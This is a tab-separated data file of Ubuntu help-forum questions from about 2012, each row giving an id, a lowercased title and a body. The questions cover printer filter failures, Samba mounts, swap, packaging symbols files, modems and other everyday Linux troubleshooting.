194662	printer prints garbage and `` /usr/lib/cups/filter/pstopdf failed '' at cups web interface	i 'm using a thermal printer tm-t20 on 12.04 x64 with cups 1.5.3-0ubuntu4 and the epson provided drivers tmt-cups-1.3.2 . the printer just prints garbage after the first print . if i turn it off and then on , it prints ok ( the first job ) , but if i send another job it prints just garbage . the printer is serial and i 'm using an usb to serial converter , i tried with different adapter to discard an usb to serial converter issue . at the cups web interface the following error is shown at job list : stopped '' /usr/lib/cups/filter/pstopdf failed '' part of the log : [ job 15 ] error : /dictstackunderflow in -- end -- [ job 15 ] operand stack : [ job 15 ] [ job 15 ] execution stack : [ job 15 ] % interp_exit .runexec2 -- nostringval -- -- nostringval -- -- nostringval -- 2 % stopped_push -- nostringval -- -- nostringval -- -- nostringval -- false 1 % stopped_push 1914 1 3 % oparray_pop 1913 1 3 % oparray_pop 1897 1 3 % oparray_pop 1787 1 3 % oparray_pop -- nostringval -- % errorexec_pop .runexec2 -- nostringval -- -- nostringval -- -- nostringval -- 2 % stopped_push -- nostringval -- [ job 15 ] dictionary stack : -- dict:1174/1684 ( ro ) ( g ) -- -- dict:0/20 ( g ) -- -- dict:77/200 ( l ) -- current allocation mode is local [ job 15 ] gpl ghostscript 9.05 : unrecoverable error , exit code 1 [ job 15 ] ppd uses qualifier 'gray..203x203dpi' [ job 15 ] calling finddevicebyid ( tmt20 ) failed to send : org.freedesktop.colormanager.failed : device id 'tmt20 ' does not exists [ job 15 ] failed to get profile filename ! [ job 15 ] no profiles specified in ppd d [ 30/sep/2012:00:25:21 -0300 ] [ job 15 ] ghostscript command line : /usr/bin/gs -dquiet -dparanoidsafer -dnopause -dbatch -dnointerpolate - sdevice=cups -sstdout= % stderr -soutputfile= % stdout -r203x203 -ddevicewidthpoints=204 -ddeviceheightpoints=841 -dcupsbitspercolor=1 - dcupscolororder=0 -dcupscolorspace=3 -dcupsrowcount=24 -scupspagesizename=rp80x297 -i/usr/share/cups/fonts -c -f -_ d [ 30/sep/2012:00:25:21 -0300 ] [ job 15 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' i tried downgrading and upgrading cups ( installing manually ) , but i was n't able to send nothing to the printer because cups was n't working ( errors everywhere ) . any idea ?
194663	show desktop icon appear very small ambiance theme ( screenshot added )	for some reason the show desktop icon in the below panel turned very small , when i change the theme and select the ambiance theme back it comes back to the normal size but when i restart the computer it again appears very small , also the ctrl+alt+d command does n't works anymore . here are the screenshots : original : corrupted :
194664	code editor similar to coda	hi i am looking for a code editor similar in interface and features to coda . mainly i do not want a program that looks like it has not been updated since 1900 's . i am trying out sublime but am hopping for an interface more similar to coda . thanks , leinardo
194667	is sublime legal to use ?	i use sublime as my primary text editor . i 've installed it using this ppa sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text after i use if for a while , when i try to save any unsaved work i get an warning saying `` this is unregistered evaluation version '' when i click `` cancel '' on the dialog box . it allows me to continue using . so is it okay to use the unlimited trial version ? need advice from askubuntu experts . thanks
194671	i shut my lid on system updates	it was n't an upgrade , i just shut the lid like an idiot . its an acer and the computer is still running but should i wait til the morning or just shut it off and boot it back up again ?
194676	ca n't install ubuntu on hp pavilion dv4 1514dx	i 'm having trouble installing 12.04.1 on my hp pavilion dv4 1514dx . the installation crashed after copying files and just as configuring apt started . i tried to report the crash details but the message said that my ubuntu version is not the authentic version and thus the crash ca n't be reported . i have tried both 32 and 64 bit version of 12.04.1 , and even 32 bit versions of 12.04 , 11.04 , and 10.04 . they all have the same type of crash with version 12.04.1 . all ubuntu iso images were burned to disk and were installed via an external dvd drive . 12.04.1 was also installed from a usb ( created using linuxlive usb creator ) . also , my laptop does not have usb 3.0 ports , only usb 2.0 ports . i also tried to install 12.04.1 on my old acer laptop ( both from external dvd drive and usb ) and it works like a charm . no problem occurs . so i believe this is not iso image or disk problem . the crashes are very consistent . they all appear during configuring apt , just after copying files . did ubuntu have any issue with hp laptops in general ? or is my laptop so special ? i have no problem with windows 7 , but i ca n't install windows xp either ( bsod right away ) . if there is any information you guys need , please let me know .
194678	install of ubuntu inside windows question	i installed ubuntu inside windows with the installer . but i accidentally only picked 18 gig for the hard drive size . is there any way to change this without uninstalling and then installing again ? i 'm using 12.04 on a dell latitude d600 , 2 gigs of ram , 250 gig hard drive .
194689	how to disable the activity log for the application lens ?	how to clear search history of application search ? every time when i select application lens or press super+a it shows up the last search and narrows down my applications based on my last search . i just want a clear application search with all the installed applications . this screenshot shows my previous search `` cal '' i want like this ( below screenshot ) every time i press super+a ..
194697	ugly fonts in 12.10 even with antialiasing turned on	i 'm feeling like there 's something wrong with font rendering because it looked a lot nicer last time i had ubuntu running on the same pc ( or even from a live cd ) . is it something wrong with my configuration ?
194701	how to adjust symbols-file in a package for a shared lib	i am trying to upgrade ktorrent in my ppa to the latest upstream version . it also requires an updated libktorrent package . it seems libktorrent was changed in incompatible ways and thus results in a new package libktorrent5 instead of the previously available libktorrent4 . however when i try to build the package on my ppa , i get errors about different symbols . i tried some ways to fix it , but it fails with different output each time . is there some guide how to correctly generate the symbols-file ? full build and build-log are here dh_strip debug symbol extraction : disabling for ppa build dh_strip debug symbol extraction : not doing anything since no_pkg_mangle is given dh_makeshlibs -xusr/lib/kde4/ -a -o -- parallel -o -- -o -- dbg-package=libktorrent-dbg dpkg-gensymbols : warning : some new symbols appeared in the symbols file : see diff output below dpkg-gensymbols : warning : some symbols or patterns disappeared in the symbols file : see diff output below dpkg-gensymbols : warning : debian/libktorrent5/debian/symbols does n't match completely debian/libktorrent5.symbols -- - debian/libktorrent5.symbols ( libktorrent5_1.3.0-0ubuntu0~ppa4_amd64 ) +++ dpkg-gensymbolsntcqu9 2012-09-30 02:21:19.000000000 +0000 @ @ -2912,13 +2912,20 @ @ _ztvn3utp9utpserver7privatee @ base 1.2.0 _ztvn3utp9utpservere @ base 1.2.0 _ztvn3utp9utpsockete @ base 1.2.0 - _zthn12_n2bt5utpex5visite14qsharedpointerins_4peeree @ base 1.3.0 - _zthn52_n3dht11findnoderspd0ev @ base 1.3.0 - _zthn52_n3dht11findnoderspd1ev @ base 1.3.0 - _zthn52_n3dht11getpeersrspd0ev @ base 1.3.0 - _zthn52_n3dht11getpeersrspd1ev @ base 1.3.0 - _zthn8_n2bt4peer12chunkallowedej @ base 1.3.0 - _zthn8_n2bt4peer12handlepacketepkhj @ base 1.3.0 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn12_n2bt5utpex5visite14qsharedpointerins_4peeree @ base 1.3.0 + _zthn16_n2bt4peer12chunkallowedej @ base 1.3.0-0ubuntu0~ppa4 + _zthn16_n2bt4peer12handlepacketepkhj @ base 1.3.0-0ubuntu0~ppa4 + _zthn24_n2bt5utpex5visite14qsharedpointerins_4peeree @ base 1.3.0-0ubuntu0~ppa4 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn52_n3dht11findnoderspd0ev @ base 1.3.0 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn52_n3dht11findnoderspd1ev @ base 1.3.0 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn52_n3dht11getpeersrspd0ev @ base 1.3.0 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn52_n3dht11getpeersrspd1ev @ base 1.3.0 + _zthn80_n3dht11findnoderspd0ev @ base 1.3.0-0ubuntu0~ppa4 + _zthn80_n3dht11findnoderspd1ev @ base 1.3.0-0ubuntu0~ppa4 + _zthn80_n3dht11getpeersrspd0ev @ base 1.3.0-0ubuntu0~ppa4 + _zthn80_n3dht11getpeersrspd1ev @ base 1.3.0-0ubuntu0~ppa4 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn8_n2bt4peer12chunkallowedej @ base 1.3.0 + # missing : 1.3.0-0ubuntu0~ppa4 # _zthn8_n2bt4peer12handlepacketepkhj @ base 1.3.0 ( c++ ) '' non-virtual thunk to bt : :chunkdownload : :getstats ( bt : :chunkdownloadinterface : :stats & ) @ base '' 1.2.0 ( c++ ) '' non-virtual thunk to bt : :chunkdownload : :~chunkdownload ( ) @ base '' 1.2.0 ( c++ ) '' non-virtual thunk to bt : :datacheckerjob : :acquired ( ) @ base '' 1.2.0 dh_makeshlibs : dpkg-gensymbols -plibktorrent5 -idebian/libktorrent5.symbols -pdebian/libktorrent5 -edebian/libktorrent5/usr/lib/libktorrent.so.5.0.0 returned exit code 1
194703	make wmctrl ignore other-than-current workspace 's windows	i rely on wmctrl a lot to switch between windows , basically to avoid typing alt-tab many times . i 've always used one workspace but now i want to begin using more than one . i was wondering if it is possible to modify the context of wmctrl so that when i type wmctrl -l , only windows from the current workspace are shown , instead of all windows from all workspaces . for example , assuming i have a firefox window opened in workspace 1 . i have a keyboard shortcut on ctrl+alt+f that executes wmctrl -a firefox , which switches to firefox . if i open a new firefox window on workspace 2 and type ctrl+alt+f , it will switch to the window at workspace 1 , which is not what i want . any suggestions/ideas on how to solve this ? edit : i 'm using compiz ( unity )
194705	how do i get a usb drive shortcut on desktop ?	is there a flash drive shortcut on ubuntu 12.04 desktop like ubuntu 10.10 desktop have ?
194706	unable to connect to router-goes to web server instead	when i type 192.168.1.1 which is supposed to open up router configuration page , i 'm being sent to apache web server 's default `` it works '' page . how to resolve this ip conflict ? this is happening on ubuntu 12.04 lts , and i am not behind any firewall .
194707	what happens under the hood when an usb drive is inserted ?	some systems use udev / pmount to automatically mount thumbdrives . how is that solved in ubuntu ( specifically , ubuntu 12.04 ) ? apparently , neither the pmount package nor the corresponding udev rules are present , yet ubuntu mounts the inserted usb drives automatically . how does that happen ?
194710	i modified the permissions of /var what have i broken ?	so i did a dumb thing , i chowned /var to a single user and now i am getting errors everywhere , i had to add permissions so that mysql and lighthttpd would start , any easy way to revert changes or must i manually revert changes ? i am getting errors like fopen : permission denied when i run apt-get . the above error can be fixed by running sudo chown -r man : root /var/cache/man
194712	how do i make geany my default editor on ubuntu ?	i actually want to change the default text editor on my ubuntu 12.04 from nano to geany . when i used this code : update-alternatives -- config editor .. i do n't see geany in the list . so to add geany , this is supposed to work right ? update-alternatives -- install /usr/bin/geany geany /usr/bin/geany 10 also , on a side note , can you tell me if you would personally suggest me to change the default editor from nano to geany , and why ?
194713	how do i remove or uninstall directdownloader from ubuntu 11.10 ?	i wanted to download a gallery of .jpg file from the internet . the website suggested the directdownloader program to be installed to be able to download this gallery . i could install the directdownloader ( dd ) but it seems to be a kind of a bug . there is no use for this program , only big problems arises because it can not run on ubuntu . also the software center does not work anymore , a blank window comes up whenever i try to launch it . how can i get rid of directdownloader ? activate software center again ? please help .
194716	mount drive on remote machine	my current set up is : i have my main machine ( darkseid ) upstairs which has a drive with all my films on it , which i do n't keep mounted . downstairs , next to the tv , i have a htpc ( archangel ) which has xbmc installed on it , which points to a samba share on the main machine . everything works fine when the drive is mounted , but is there a script i can write to send a command to the upstairs machine from the downstairs machine to mount the drive to save the walk upstairs ? # lazy both machines are ubuntu 12.04
194719	i have an apache process that takes 98 % cpu . how can i find what apache call it runs ?	as you can see below , a single apache process hangs and takes large amount of cpu resources . how can i find what http call this apache process runs ? pid user pr ni virt res shr s % cpu % mem time+ command 12554 www-data 20 0 776m 285m 199m r 97 3.7 67:15.84 apache2 14580 www-data 20 0 748m 372m 314m s 4 4.8 0:13.60 apache2 12561 www-data 20 0 784m 416m 322m s 3 5.4 0:58.10 apache2 12592 www-data 20 0 785m 427m 332m s 2 5.6 0:57.06 apache2
194725	how to use huawei e173 in 12.04 ?	i have a huawei e173 usb stick to access the internet . it works normally on windows but i need to use it on my ubuntu system . i plug it in , and after 25-20 seconds the status light turns green and blinks twice every 3 seconds . i see no changes in my system whatsoever , nothing gets installed , i do n't get prompted for my pin . i tried to create a connection using edit connections . i entered the following parameters : turkey , turkcell , my plan is not listed , internet . nothing happens . i tried the lsusb command and got the following : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 058f : a001 alcor micro corp . bus 001 device 004 : id 12d1:14ba huawei technologies co. , ltd . i tried the usb-devices command and can see the device : t : bus=01 lev=01 prnt=01 port=01 cnt=01 dev # = 4 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=12d1 prodid=14ba rev=00.00 s : manufacturer=huawei technology s : product=huawei mobile c : # ifs= 2 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage i : if # = 1 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage based on other advice i found , i tried the following command : sudo modprobe usbserial vendor=0x12d1 product=0x14ba again , nothing happened . my question is why does the `` enable mobile broadband '' not populate automatically in the dropdown networking menu and how can i start using the device ?
194727	mounting samba share whenever it 's available , unmounting when it 's not	i am trying setup permanent samba share mounts . that 's not too hard using these instructions . but , i want them to automatically remount whenever i join the network where these shares are available . automatically unmount ( or make access requests fail immediately instead of hanging ) whenever i leave the network , i.e . avoid this automatically . googling suggests that autofs might be helpful . i gather it takes care of the 1. above but i am not sure about the 2 . the other questions about automated samba mounts , i.e . how to mount a samba share permanently ? , do not seem to address automatic remounts/unmounts , so i think this is not a duplicate . thanks .
194729	realtek nics wo n't operate at 1000baset	i have tried a realtek 8139 and realtek 8111 nic on my 12.04 ubuntu desktop machine . neither will operate at 1000baset when i try to force it with ethtool .
194736	colored text format for readme or simple documentation files	i am looking for a colored format that is supported by ubuntu to write documentation files that can be displayed colored and bolded to be displayed on a text editor like gedit . i wanted to ask it before getting to start to create my own format . does anyone know such a format ?
194740	webmin no route to host	using webmin â network configuration , i added a new dns address to the existing server ( 10.100.200.300 ) . while i saved the new configuration , i lost access to webmin and ssh to this server . how can i retrieve access ? i pinged 10.100.200.300 and its dead . when i tried to login with ssh it says : error no route to host . i usually log in to webmin the server ip address and port 10000 but now i can not . any help to go back to my previous state ?
194744	how to disable internal speaker audio	under 12.04 : how do i disable globally the internal speaker of my computer without having to unset it to each user session ? i 've tried to add `` blacklist pcspkr '' into `` /etc/modprobe.d/blacklist '' but it still let pulseaudio to use the internal speaker . here is the lsmod that does n't appear to show the pc speaker working : module size used by coretemp 13361 0 dcdbas 14098 0 snd_hda_codec_via 46188 1 microcode 18395 0 snd_hda_intel 33028 5 snd_hda_codec 116476 2 snd_hda_codec_via , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 81052 4 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25425 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi serio_raw 13031 0 lpc_ich 16992 0 snd_seq 51568 2 snd_seq_midi , snd_seq_midi_event hid_generic 12445 0 snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62520 17 snd_hda_codec_via , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac_hid 13077 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 1 lp usbhid 46022 0 hid 82474 2 hid_generic , usbhid aufs 159970 69 overlayfs 27511 0 squashfs 36095 1 nbd 17427 1 r8169 56852 0 i915 470739 0 drm_kms_helper 45427 1 i915 drm 231841 2 i915 , drm_kms_helper i2c_algo_bit 13316 1 i915 video 19069 1 i915 however i 'm hearing music from the pc speaker . maybe it 's at the pulseaudio level but how to do the change global and not limited to one user ? thank you !
194745	is there anything free on ubuntu that is similar to dreamweaver ?	i would like to build a website ... ... .i need something that has more or less pre-built designs ( buttons , menu structures ... etc ) and would work on ubuntu ( under the free license thingy ) . i really dont want to use e107 , nor wordpress . i need something more professional looking like dreamweaver . i already have the domain , the ftp access ... .i have the photos and the text that i need on the website ... ... so ... ..i need something to make the texts and the photos look good and upload them . simple as that . wordpress , for example , does n't really give me this freedom . it has the prebuilt themes that are many many times hard to shift around . i need something more like dreamweaver . i dont mind the learning curve as long as it 's worth spending time learning a new software . thanks .
194749	free space 916.6mb on c drive	i installed windows installer wubi , first time you install , it asks how much hard drive you want to install , as you know it has 5gb to 11gb , i chose 5gb to install ubuntu on my computer and was fully installed successfully . the problem is when i go to my computer > file system > properties it brings pie chart of what capacity is and shows 3.3gb/used 2.4gb which has been used by ubuntu installation/free space of 916.6mb only . note : 1 ) capacity 3.3gb seems to be low 2 ) ubuntu used 2.4gb for installion 3 ) free space 916.6mb is very limited memory capacity 3.3gb-2.4gb=916.6mb and when i installed 5gb hard drive , how can it be only 3.3gb only .
194750	how do i install a gamepad with vibration ?	i 've been looking at gamepads for my gaming needs and so far i have n't found a single opinion as to what works and what does n't . are there any gamepads that have the rumble ( vibration ) feature working ? can i use multiple ps3/x360 gamepads at the same time ?
194752	moved hdd to a new pc , network card stopped working	i moved my hdd to a new pc . the hardware is different from the old pc . i was able to get online yesterday , however not anymore today . i can see when i run ifconfig -a that it is telling me that i have eth0 and eth1 . the old pc has 2 network cards , the new one only has one . i am assuming that the issue is that it is looking for the mac of the old network cards and not the new one . i deleted the entries in 70-persistant-net.rules and it reprinted the same eth0 and eth1 on reboot . the version is ubuntu 11.04 . i do want to upgarde to 12.04 however i dont have a cd rom and the new box isnt booting from a flash drive . i tried running dhclient on both eth0 and eth1 and in both cases the waits for about 60 to 90 seconds and then just gives me the command line again without printing any information . i then go back to ifconfig -a and i now ever a new entry ethx : avahi link encap : ethernet and then eventually i see an inet address of 169.xxx.x.xxx which is an error address any suggestions on how to resolve this issue ? maybe it is a driver issue since i moved to the new box ? it just doesnt make sense that i had internet yesterday and today i do not . thanks
194755	how to change account type back to administrator in 12.10 ?	can not install anything as no longer a member of sudo . have tried recovery but get an error . : ( specifically `` gpasswd : can not lock /etc/group ; try again later . '' unmount / remount is that useful ? solved !
194768	firefox and google-chrome need about 30 sec to launch any home page	this issue started 1 month ago . let me explain . i 'm running 12.04 x64 with unity . connected through wireless . every time i launch either firefox or google-chrome , these browser need at leat 25-30 sec to launch my home page ( whatever homepage that be ) . used to work perfectly . opera works a bit better but still ... . i already tried firfox in safe mode whithout any extension activated , switch from network-manager to wicd , erased all my configuration files under /home ... .nothing helped . tried also to tweak my router ... but nothing . to make it even more `` funny '' all my other laptops do n't have this issue ... in 1 sec there goes my home page ... . ; ) please ... does anybody have a clue ? thanks
194772	configuring a dns server like opendns	i want to configure a bind server that responds with a zone file even if this zone file was not created earlier . basically i need a parking dns server that every responds to every domain name ( just like opendns ' fallback server ) does bind allow a dns server like that or do you have any other server to do this in short way ?
194775	`` swap not available '' - i must manually `` swapon '' after every reboot	i am on ubuntu 12.04 , thinkpad edge 13 , encrypted home . a message in the system monitor tells me that swap is `` not available '' . i can get it back using the swapon option in gparted ( i thought i could also do sudo swapon -a in a terminal , but that does not work ) . the problem is that i have to swapon after every reboot . how can i switch it back on so it stays on even after a reboot ? my fstab : # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=47641b93-9d12-4e6a-b803-dde28f0e5725 / ext4 errors=remount-ro 0 1
194782	execute commands when system is started	how can i specify the commands which i want to execute when system is started ? so far i tried to write it in .initrc , .xinitrc , .xprofile but none of them seems working . i use ubuntu 12.04 and lightdm .
194783	menu launcher stopped working	i 'm running ubuntu 12.04 with a working auto-hide launcher bar , i.e. , the touch to the left of the screen revealed the menu . it has stopped working perhaps the result of an automatic update . i have tried setting the sensitivity to no avail . i have turned off the auto-hide feature so that i have access to the bar .
194787	separate keyboard shortcuts for switching between keyboard layouts	i have a few language keyboard layouts installed in 12.04 . i am using ctrl-shift keyboard shortcut for switching between language layouts . such switching method takes a lot of my time . is there any possibility to set up a different keyboard shortcut for each language keyboard layout ? for example : ctrl-shift-1 ( english layout ) , ctrl-shift-2 ( polish layout ) , ctrl-shift-3 ( italian layout ) , etc .
194788	how do i install ubuntu on windows , from a mac ?	not sure if the title is specific enough , so here we go : i crashed my windows pc , and now i want to install ubuntu on that computer . i 'm currently using my mac , as it is the only operable computer i have left . i have downloaded the .iso . i guess my question is ; how do i go about installing ubuntu on my crashed computer from the external harddrive ? i 've used ubuntu before , but i used to install it from a cd-rom . i tried reading the instructions , but could n't really understand them . please help edit : as tom mentioned , i only want to install ubuntu on the ( formerly ) windows machine . anyways , thanks for the quick responses , i think i 've got it from here . cheers
194791	can not install shell-themes using gnome-tweak-tool	how do i fix this ? i will attempt to upload a screenshot of the problem . notice there is an error like triangle near the shell themes and nothing is select-able . also there are no shell extensions under the shell extensions tab . i have come across many postings on how to fix this but none worked for me . i currently have 12.04 lts . i have a custom phenom quad core machine with radeon hd 5770 graphics if that helps .
194794	how to make samba to ask password on every access ?	we have configured samba with password protected share folders . the problem what we are facing is , multiple users were allowed to use the same system . for example if the user a uses the system s1 for the first time the system is prompting for username & password for acessing the samba shared folders and later if the user leaves the place and if user b comes in for accessing the same system say s1 it is not asking for password . any way to fix this issue ? note : i know this happens because of persistent connections . but any way to control persistent connections from samba server itself ? possible to make samba server to ask password on every access by disabling persistent connections ? ? i hope there is some possible way , but i have not got one . i have already tried the deadtime parameter but that simply closes the idle connections and makes the resource free . i.e if the new user comes and access the samba share and then it wont prompt for username & password . updates : using both ubuntu and windows and samba share is running on ubuntu server 12.04 . on accessing samba share from ubuntu i dont face any problems . once i unmount the share after using it , it is prompting for username and password for the second time . but in windows when i access samba share for the first time , second time it is not prompting for the username and password simply the samba shared is getting accessible . i just want windows machine to ask password everytime when the user closes the share , instead of doing net use * /delete everytime , and we cant order user to do this everytime . is there a way to block this behaviour and make samba server to ask password everytime whenever they access it via windows systems ? ? what i want to fix is , for example user a , b , & c has password credentials to access samba share , where as user d , e & f are not authorized to access samba share but all of them are authorized to use the same system say system a .
194795	easybcd vs alongside windows option	are there negatives to easybcd ? i am going to have three partitions : win7/lubuntu/shared ntfs . could i even get a third partition with the alongside method ? i know easybcd works , but would prefer to use the tools given from the os provider if possible .
194796	installation problem ubuntu 12.04 crashing hardware error	i am running on ubuntu 8.04 for quite some time without many problems . about almost a year ago or so i have been trying to upgrade to 10.04 lts , but without any success . each time when trying to upgrade or even newly install the installation process crashed after about an hour or so ( i forgot exactly how long ) . now i wanted to try ubuntu 12.04 ( not even installing , but i only selected `` try ubuntu without installing '' ) and i got similar errors . i did not try to install it , because of earlier experience with 10.04 when after i also lost 8.04 and had to install from scratch again ( after which it worked ) . i get the following screen ( as i am not allowed to upload photos here the text ) : 26.767262 ] [ hardware error ] : cpu 0 : machine check exception : 0 bank 5 : b200001804000e0f 26.767279 ] [ hardware error ] : tsc 0 26.767287 ] [ hardware error ] : processor 0:6f6 time 1349017924 socket 0 apic 0 microcode 44 26.767297 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767307 ] [ hardware error ] : cpu 1 : machine check exception : 0 bank 1 : b200000000000175 26.767316 ] [ hardware error ] : tsc 0 26.767323 ] [ hardware error ] : processor 0:6f6 time 1349017924 socket 0 apic 1 microcode 44 26.767331 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767339 ] [ hardware error ] : cpu 1 : machine check exception : 0 bank 5 : b200003000000e0f 26.767348 ] [ hardware error ] : tsc 0 26.767354 ] [ hardware error ] : processor 0:6f6 time 1349017924 socket 0 apic 1 microcode 44 26.767363 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767371 ] [ hardware error ] : cpu 1 : machine check exception : 4 bank 1 : b200000000000175 26.767379 ] [ hardware error ] : tsc 1bf231e65f 26.767386 ] [ hardware error ] : processor 0:6f6 time 1349017951 socket 0 apic 1 microcode 44 26.767395 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767403 ] [ hardware error ] : cpu 1 : machine check exception : 4 bank 5 : b200003008000e0f 26.767413 ] [ hardware error ] : tsc 1bf231e65f 26.767421 ] [ hardware error ] : processor 0:6f6 time 1349017951 socket 0 apic 1 microcode 44 26.767429 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767437 ] [ hardware error ] : cpu 0 : machine check exception : 5 bank 5 : b200001806000e0f 26.767447 ] [ hardware error ] : rip |inexact| 60 : < 00000000c1018b5c > { mwait_idle+0x7c/0x1d0 } 26.767464 ] [ hardware error ] : tsc 1bf231e674 26.767471 ] [ hardware error ] : processor 0:6f6 time 1349017951 socket 0 apic 0 microcode 44 26.767480 ] [ hardware error ] : run the above through 'mcelog -- ascii' 26.767487 ] [ hardware error ] : machine check : processor context corrupt 26.767495 ] kernel panic - not syncing : fatal machine check 26.767505 ] pid : 579 , comm : debconf-communi tainted : g m 3.2.0.29-generic-pae # 46-ubuntu 26.767515 ] call trace : 26.767525 ] [ < c158f812 > ] ? printk+0x2d/0x2f 26.767534 ] [ < c158f6e0 > ] panic+0x5c/0x161 26.767542 ] [ < c10247ef > ] mce_panic.part.14+0x13f/0x170 26.767551 ] [ < c1024872 > ] mce_panic+0x52/0x90 26.767558 ] [ < c1024a18 > ] mce_reign+0x168/0x170 26.767565 ] [ < c1024bb5 > ] mce_end+0x105/0x110 26.767572 ] [ < c10252db > ] do_machine_check+0x32b/0x4f0 26.767581 ] [ < c1024fb0 > ] ? mce_log+0x120/0x120 26.767590 ] [ < c15a5e47 > ] error_code+0x67/0x6c 26.767602 ] panic occurred , switching back to text console 26.768498 ] rebooting in 30 seconds.. for information , i have also tried earlier arch linux . i can install it , but when i try to install a window manager ( lxde ) again i got similar errors . fedora also crashes when installing and also mandriva did not work for me . therefore i think something deep in the machine might be wrong . but as stated above i can ( clean ) install 8.04 and also 9.10 can be installed without problems . also updates for 8.04 can be installed . my machine is dual boot with xp next to it on a different partition . my hw : memory : 2.0 gib ; processor 0 : intel ( r ) core ( tm ) 2 cpu 6320 @ 1.86ghz ; processor 1 : intel ( r ) core ( tm ) 2 cpu 6320 @ 1.86ghz ; how can i install ubuntu 12.04 ? last option would be to completely format my machine and install everything from scratch , but even i am not sure if that would solve it in the end . can anybody help me out ?
194798	terminal stuck at top left corner and i ca n't move it	i did something to lock the terminal in the upper left hand corner of my screen . i can not get a response other than error messages . your help will be appreciated .
194799	no internet on 12.04.1	i have no internet on ubuntu 12.04.1 so i 'm on a desktop so i got to install a .exe program to run my wireless card for my desktop so i got internet access , but i ca n't seem to download wine or its source files . if i do i put on my usb and boot into ubuntu but then when i try to open it i get the programs source files etc . anyone who could help me please do : | ( i ca n't install wine from software center since i have no connection online ) . note : i can download my stuff on windows 8 boot so i can transfer files to my usb to run on ubuntu .
194800	install remmina quantal ( 12.10 ) on precise ( 12.04 )	i 'm on precise , and using remmina that 's got some annoying window placement bugs . the version that 's packed with quantal seems to have those bugs fixed , but when i look at `` about '' it 's the same versions . -how do i get the quantal version of remmina installed in precise ? thanks .
194802	partitions mixing up	i am trying to install ubuntu alongside my windows 7 . the problem is that ubuntu is not detecting all of my partitions and basically clubs together many of them . the same thing is done by using gparted . however this problem does not arise while i am using windows - 7 . i cant paste the image of gparted since i dont have the required reputation ... i think this could be due to stray gpt data but am not sure how to take care of it . can someone help me figure this out ? the output of fdisk -l is as follows disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20000000 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 146802687 73297920 42 sfs /dev/sda4 146802688 625140399 239168856 42 sfs however actually i have 4 partitions along with 25 gb unallocated space that i had thought to use for ubuntu installation .
194806	where do i set the caps lock key behaviour ?	i have notice that since a few days my cap lock stays on if i press on caps lock . i ca n't desactivate it . i am currently using ubuntu 12.04lts on my old emachines computer . so i would like to know where is the command to get back the default settings when i press the caps lock .
194812	ca n't change brightness on toshiba l755 laptop	i have a toshiba l755 laptop , and i installed 12.04 64bit on it . the default brightness of the laptop is set to maximum value , and i ca n't change it . if i go to configuration â brightness , the brightness does n't change and neither does pressing the function keys . i tried changing some parameters of grub file , setting grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' . when changing the brightness from configuration , the value of /sys/class/backlight/toshiba/brightess changes , but screen remains the same . if i use the key functions , it changes the `` actual_brightness '' files . i do n't know what else can i do , any suggestions ?
194813	is it possible for an application ( written in mono c # ) to run a console command ?	i am wondering if a mono c # application running in ubuntu can somehow run a terminal command . for example , could the user give the program his or her password and then have the application run sudo apt-get install application-name ( console requests password ) password ( console requests confirmation ) y preferably , this would be done without actually opening a terminal visible to the user , so that the application could provide the necessary feedback and manage the whole operation cleanly with as little user interaction as possible . is there a way to do that ? if so , how ? let me know if clarification is needed . thank you !
194816	ubuntu one no referral bonus	i have set up 5 of my friends to ubuntu one and should have had 2.5gb of referral bonus , when i set up one of the account the website crashed which must have skipped the referral process . my friends is still able to log in and use it but neither him or me have got the 0.5gb referral . please help as i need the extra storage .
194827	what is ubuntu single ?	have received a password for ubuntu single and i do n't know what ubuntu single is ? can someone enlighten me ? thanks
194832	why is 12.04.1 `` unable to boot ''	i am trying to install ubuntu 12.04.1 for the first time on my laptop . when i select `` install on disk '' , it gives me this error message . this kernel requires the following features not present on the cpu ; pae unable to boot - please use a kernel appropriate for your cpu . i get this message both when attempting to install from a usb drive and a cd . just in case it matters , my laptop is a dell inspiron 600m . it has an intel pentium m chip .
